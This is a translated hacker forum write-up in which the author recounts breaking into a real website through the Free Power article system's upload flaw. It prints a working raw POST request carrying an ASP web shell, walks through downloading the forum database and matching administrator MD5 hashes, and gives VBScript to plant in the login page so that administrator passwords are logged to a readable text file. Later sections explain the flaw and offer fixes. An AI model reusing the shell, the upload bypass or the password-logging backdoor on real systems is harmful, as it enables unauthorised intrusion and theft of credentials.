This is how I broke into a hacker site.

Source: evil baboons China
Author: evil cat [E.S.T.]

I recently had a few days off at home with nothing to do, so I spent most of the time surfing the Internet. Today I went through several security sites (all of the new articles on them have already been reposted to the E.S.T. forum). With time to kill, I simply browsed the sites they link to, looking for anything new.
Now let's take a look at one of those linked sites. The site's designer did a good job, but after reading the articles there was nothing very new. As I was leaving the site, I noticed that its page layout looked very familiar: a dynamic article system that I guessed was the Free Power article system. The site also ran Dvbbs 7.0 SP2. Occupational habit made me curious about this site, haha, so I registered an account in the Free Power article system and looked at the article management page in the user control panel. I don't need to spell out what I had in mind: upload, haha. The upload page said "Sorry, this site is not allowed to upload." So even a hacker site has the upload vulnerability. How to get around this? I remembered an article I posted in XFile titled "Breaking Through the Block: Reusing the Free Power Article Upload Vulnerability", which showed that even when a site prohibits uploads, we can still use a POST attack to upload an ASP trojan. Would that method work here too? Well, let's try. First I requested http://www.xxx.com/upload_soft.asp, which came back with the "not allowed" message. Then I requested http://www.xxx.com/upfile_soft.asp directly.
The page returned "Select the file you want to upload first!" Haha, this means nc can be used to submit a POST request carrying the upload data, and the POST content is of course an ASP trojan. From here the chance of success is only 50%, because if the other side has fixed the upload vulnerability the file type check will still fail even with POST. I took a packet I had used before for the Free Power upload vulnerability, modified it, and submitted it with nc. Hey, the upload succeeded. I won't go into how to modify the packet and exploit the upload vulnerability; you should all be familiar with that.
The POST packet used above is given below:

Code:
POST /upfile_soft.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.xxx.com/upload_soft.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d531c251_a0c
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 1.1.4322)
Host: www.xxx.com
Content-Length: 1497
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: aspsessionidqscqsada=iceejphaljlebhkfiojdplevels; 831225=cookiedate=1&Password=635d6ca36de2ff6f&userlevel=999&username=cat;
-----------------------------7d531c2520.a0c
Content-Disposition: form-data; name="filename"; filename="C:/Documents and Settings/e.cat/desktop/injection/mm.asp.rar"
Content-Type: text/plain

<% dim objfso %>
<% dim fdata %>
<% dim objcountfile %>
<% on error resume next %>
<% set objfso = server.createobject("scripting.filesystemobject") %>
<% if trim(request("syfdpath")) <> "" then %>
<% fdata = request("cyfddata") %>
<% set objcountfile = objfso.createtextfile(request("syfdpath"), true) %>
<% objcountfile.write fdata %>
<% if err = 0 then %>
<% response.write "<font color=red>Save success!</font>" %>
<% else %>
<% response.write "<font color=red>Save unsuccess!</font>" %>
<% end if %>
<% err.clear %>
<% end if %>
<% objcountfile.close %>
<% set objcountfile = nothing %>
<% set objfso = nothing %>
<% response.write "<form action='' method=post>" %>
<% response.write "Save the file to this <font color=red>absolute path (including the file name, for example D:/web/x.asp):</font>" %>
<% response.write "<input type=text name=syfdpath width=32 size=50>" %>
<% response.write "<br>" %>
<% response.write "Absolute path of this file: " %>
<% = server.mappath(request.servervariables("script_name")) %>
<% response.write "<br>" %>
<% response.write "Content of the horse to write: " %>
<% response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>" %>
<% response.write "<input type=submit value=save>" %>
<% response.write "</form>" %>
-----------------------------7d531c251_a0c
Content-Disposition: form-data; name="Submit"

upload
-----------------------------7d531c251_a0c--

Through the uploaded trojan I wrote an Ocean 2005 shell and had a look at the website directory. Permissions were locked down tight: I could only view the website directory and could not execute cmd. But there was still that Dvbbs 7.0 SP2, and it doesn't matter how many commands I can run. Download the database and have a look first. After downloading it, I opened it with the database assistant browser. On the forum page you can see that XXXX is the forum administrator. The dv_user and dv_admin tables in the database show that the front-end and back-end user names and passwords of the forum are different. Then I used the database browser to search the content field of the dv_log table for the keyword "password", to check whether an administrator password appeared in clear text. From the front-end dv_user table, the front-end administrator is XXXX and the back-end administrator is 008; could the front-end password be the same as 008's back-end password? I used an MD5 converter to verify my guess, and I guessed right; it seems hackers also need luck. All right, now I knew the front- and back-end passwords of Dvbbs. With the administrator password, even if the aspshell is lost you can still back up a shell. Next, let's look at the Free Power database. The MD5 of the administrator password in the admin table of the Free Power database differs from the Dvbbs one, so the administrator still has some security awareness. I made a few guesses, but this time I was not so lucky and did not guess it. It doesn't matter; I still have a way to get his password. Analyzing the Free Power source code shows that password verification relies on the admin_chklogin.asp file, so let's analyze that. Part of the file is as follows:

Code:
username = Replace(Trim(Request("username")), "'", "")
password = Replace(Trim(Request("password")), "'", "")
checkcode = Replace(Trim(Request("checkcode")), "'", "")
If username = "" Then
    founderr = True
    errmsg = errmsg & "<br><li>The user name cannot be blank!</li>"
End If
If password = "" Then
    founderr = True
    errmsg = errmsg & "<br><li>The password cannot be blank!</li>"
End If
If checkcode = "" Then
    founderr = True
    errmsg = errmsg & "<br><li>The verification code cannot be blank!</li>"
End If
If Session("checkcode") = "" Then
    founderr = True
    errmsg = errmsg & "<br><li>Your logon session has timed out. Please return to the logon page and log on again.</li>"
End If
If checkcode <> CStr(Session("checkcode")) Then
    founderr = True
    errmsg = errmsg & "<br><li>The verification code you entered does not match the one generated by the system. Please enter it again.</li>"
End If
If founderr <> True Then
    password = MD5(password)
    SQL = "select * from Admin where Password='" & password & "' and username='" & username & "'"
    Set rs = nt2003.execute(SQL)
    If rs.BOF And rs.EOF Then
        founderr = True
        errmsg = errmsg & "<br><li>Incorrect user name or password!!!</li>"
    Else
        If password <> rs("password") Then
            founderr = True
            errmsg = errmsg & "<br><li>Incorrect user name or password!!!</li>"
        Else
            nt2003.execute("Update admin set lastloginip='" & Request.ServerVariables("remote_addr") & "', lastlogintime='" & Now & "', logintimes=logintimes+1 where username='" & username & "'")
            Session.Timeout = CLng(nt2003.site_setting(15))
            Session("adminname") = username
            rs.Close
            Set rs = Nothing
            Response.Redirect "admin_index.asp"
        End If
        rs.Close
        Set rs = Nothing
    End If
End If
If founderr = True Then
    Call writeerrmsg()
End If

As you can see, there are no obvious basic errors: when founderr <> True, the program converts the password entered by the user to MD5 and hands it to the database for the query. So we use the following code:

Code:
Dim fsoobject
Dim tsobject
Set fsoobject = Server.CreateObject("Scripting.FileSystemObject")
Set tsobject = fsoobject.CreateTextFile(Server.MapPath("cat.txt"))
tsobject.Write CStr(Request("password"))
Set fsoobject = Nothing
Set tsobject = Nothing

and insert it at this point in the file:

Code:
If password <> rs("password") Then
    founderr = True
    errmsg = errmsg & "<br><li>Incorrect user name or password!!!</li>"
Else

The next time the administrator logs on, his password is written to cat.txt, and we can read it at http://www.xxx.com/cat.txt. This idea is not originally mine, but it is still the first choice for use against Free Power. Some friends may say that with a webshell in hand there is no reason for me to still be so interested in the administrator's password. Hey, the administrator's personal accounts, such as QQ, e-mail and FTP, probably share one and the same password (don't do this; I am only doing a test), so we had better not use the same password everywhere. The intrusion stops here for now; privilege escalation is a matter for the future. Let me explain to you why a POST attack works against the Free Power article system.

There are two reasons for this success: first, the Free Power program still allows a POST attack when uploading has been disabled in the site settings, and second, the program has an upload vulnerability. Fundamentally, it is the upload vulnerability.
The following is an analysis of the first problem:
When we request http://www.xxx.com/upload_soft.asp, the page says
"Sorry, this website cannot upload files!"
Let's take a look at part of the source code of upload_soft.asp:

Code:
<%
If nt2003.site_setting(7) = 1 Then
%>
<form action="upfile_soft.asp" method="post" name="form1" onsubmit="return check()" enctype="multipart/form-data">
<input name="filename" type="file" class="tx1" size="40">
<input type="submit" name="Submit" value="Upload" style="border: 1px double rgb(88,88,88); font: 9pt">
</form>
<%
Else
    Response.Write "Sorry, this website cannot upload files!"
End If
%>

We notice that the upload form appears only if nt2003.site_setting(7) = 1.
Now we request http://www.xxx.com/upfile_soft.asp directly.
The page returns "Select the file you want to upload first!"
Let's take a look at part of the source code of upfile_soft.asp:

Code:
<%
nt2003.getsite_setting()
Const upload_type = 0            ' upload method: 0 = "No Fear" component-less upload class, 1 = FSO upload, 2 = lyfupload, 3 = aspupload, 4 = chinaaspupload
Const saveupfilespath = "uploadsoft"
Const upfiletype = "rar|zip|exe|mpg|rm|wav|mid"
nt2003.site_setting(7) = 1       ' pay attention to this!!!!
Const maxfilesize = 102400
...
Sub upload_0()                   ' use the component-less upload class
    Set upload = New upfile_class    ' create an upload object
    upload.GetData(104857600)        ' get the uploaded data; the maximum size is 100 MB
    If upload.err > 0 Then
        Select Case upload.err
            Case 1
                Response.Write "Select the file you want to upload first!"
            Case 2
                Response.Write "The total size of the files you uploaded exceeds the maximum limit (100 MB)"
        End Select
        Response.End
    End If

Requesting upfile_soft.asp directly only prompts us to select a file, so nothing stops us from POSTing the file straight to it. Notice the line marked above: the handler sets nt2003.site_setting(7) = 1 itself, so the check in upload_soft.asp merely hides the form and does not protect the handler.
In addition, Free Power does not check the user's cookies during upload, which is very dangerous. bbsgood does well in this respect: although bbsgood also has the upload vulnerability, its official website has not enabled the upload function and has not been hacked, because bbsgood checks the contents of the user's cookies during upload. For example, the following section of bbsgood's upload_id.asp:

Code:
username = Request.Cookies("username")
password = Request.Cookies("password")
If Request.Cookies("login") = "Y" And imageid > 0 Then
    Set rs = conn.execute("select top 1 ID, user name, password, permission, account status from bbsgood_user where username='" & username & "'")
    If (rs.BOF And rs.EOF) Or rs("password") <> password Then
        Response.Write i + 1 & ", you do not have the upload permission<br>"
    Else
        If (imageid = 1 And (rs("permission") = "admin" Or rs("permission") = "bbsadmin")) Or (imageid = 2 And rs("permission") = "admin") Or (imageid = 3 And rs("permission") = "bbsadmin") Or imageid = 4 Then
            filename = SaveFile(formfieldname, filepath, maxfilesize, savtype, fsotype, forbidtype)   ' save and get the file name
        Else
            Response.Write i + 1 & ", you do not have the upload permission<br>"
        End If
    End If
End If

If it weren't for this code, I think bbsgood's official website would have been hacked as soon as the upload vulnerability was discovered...

The following is an analysis of the second problem:
Everyone is familiar with the upload vulnerability, and there are many articles analyzing its cause, so I will only repeat it briefly. "asp " (with a trailing space) is not equal to "asp", but Windows automatically removes trailing spaces from a filename, so when we upload a file named with a trailing space it is saved as an .asp file. However, I found very few articles on the Internet about how to fix the upload vulnerability; I searched Google for a long time and found none. The people who exploit the upload vulnerability do not fix it; the common practice is to delete files or something like that, which is really bad. In fact, we can use the Trim function to fix the vulnerability. MSDN describes the Trim function as follows:
Trim Function
Returns a copy of a string without leading spaces (LTrim), trailing spaces (RTrim), or both leading and trailing spaces (Trim).
LTrim(string)
RTrim(string)
Trim(string)
The string argument is any valid string expression. If string contains Null, Null is returned.
Remarks
The following example uses the LTrim, RTrim, and Trim functions to trim leading spaces, trailing spaces, and both leading and trailing spaces, respectively:
Dim MyVar
MyVar = LTrim("  vbscript ")   ' MyVar contains "vbscript ".
MyVar = RTrim("  vbscript ")   ' MyVar contains "  vbscript".
MyVar = Trim("  vbscript ")    ' MyVar contains "vbscript".

We know that Free Power uses the "No Fear" upload class; the part of upfile_class.asp with the upload vulnerability reads:

Code:
ofileinfo.filename = Mid(sfilename, InStrRev(sfilename, "/") + 1)
ofileinfo.filepath = Left(sfilename, InStrRev(sfilename, "/"))
ofileinfo.fileext = Mid(sfilename, InStrRev(sfilename, ".") + 1)

As you can see, spaces are not filtered at all. We can use the Trim function to fix it like this:

Code:
ofileinfo.filename = Trim(Mid(sfilename, InStrRev(sfilename, "/") + 1))
ofileinfo.filepath = Trim(Left(sfilename, InStrRev(sfilename, "/")))
ofileinfo.fileext = Trim(Mid(sfilename, InStrRev(sfilename, ".") + 1))
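Pulling the two problems together, here is an added example in Python (not Free Power's or the upload class's code) of the checks an upload handler needs on the server side: the upload-enabled and logged-in conditions that upload_soft.asp only enforces by hiding the form, and the filename normalisation that the Trim fix addresses. The allow-list mirrors the upfiletype constant quoted above; UploadRequest and SiteSettings are constructed stand-ins, and the example goes one step beyond Trim by also stripping trailing periods, which Win32 drops from a filename just as it drops trailing spaces.

```python
from dataclasses import dataclass

# Allow-list copied from the upfiletype constant quoted from upfile_soft.asp.
ALLOWED_EXT = {"rar", "zip", "exe", "mpg", "rm", "wav", "mid"}


def win32_final_name(submitted: str) -> str:
    """Return the name Win32 will actually create from a submitted filename.

    The client-supplied directory part is untrusted and discarded. Win32 drops
    trailing spaces and trailing periods from a path component, so 'mm.asp '
    and 'mm.asp.' both land on disk as 'mm.asp'; the extension check has to
    run on this normalised form, never on the raw string.
    """
    base = submitted.replace("\\", "/").rsplit("/", 1)[-1]
    return base.rstrip(" .")


def extension(name: str) -> str:
    """Extension after the last dot, lower-cased: 'RAR' and 'rar' are one type."""
    return name.rsplit(".", 1)[1].lower() if "." in name else ""


def flawed_filter_allows(submitted: str) -> bool:
    """The comparison the article describes: 'asp ' <> 'asp', so a raw name
    with a trailing space passes a check that looks only at the untrimmed
    extension, and Windows then saves it as .asp."""
    return extension(submitted) != "asp"


@dataclass
class UploadRequest:            # constructed stand-in for the multipart POST
    filename: str
    session_may_upload: bool    # hypothetical flag populated by the login code


@dataclass
class SiteSettings:             # constructed stand-in for nt2003.site_setting(7)
    uploads_enabled: bool


def handle_upload(req: UploadRequest, settings: SiteSettings) -> str:
    """Server-side gate for the upload handler: every condition that the form
    page only enforces by hiding the form is re-checked here, because the
    handler can be posted to directly."""
    if not settings.uploads_enabled:
        return "rejected: uploads disabled"
    if not req.session_may_upload:
        return "rejected: not authorised"
    name = win32_final_name(req.filename)
    ext = extension(name)
    if ext not in ALLOWED_EXT:
        return f"rejected: extension '{ext}'"
    return f"accepted: {name}"
```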

Well, this is much better. For the Dvbbs upload vulnerability, you can compare the old upfile.asp in Dvbbs with the current upfile.asp to understand how it was fixed.
With the problem analyzed, I looked up the webmaster's e-mail and told him that the website had an upload vulnerability, that I had fixed it for him, and that all the webshells had been removed, and reminded him to change the passwords of the article system and BBS administrators. Learning something from this intrusion is enough; why deface the home page to show off? Isn't this a better way to improve network security in China? Be a good boy...
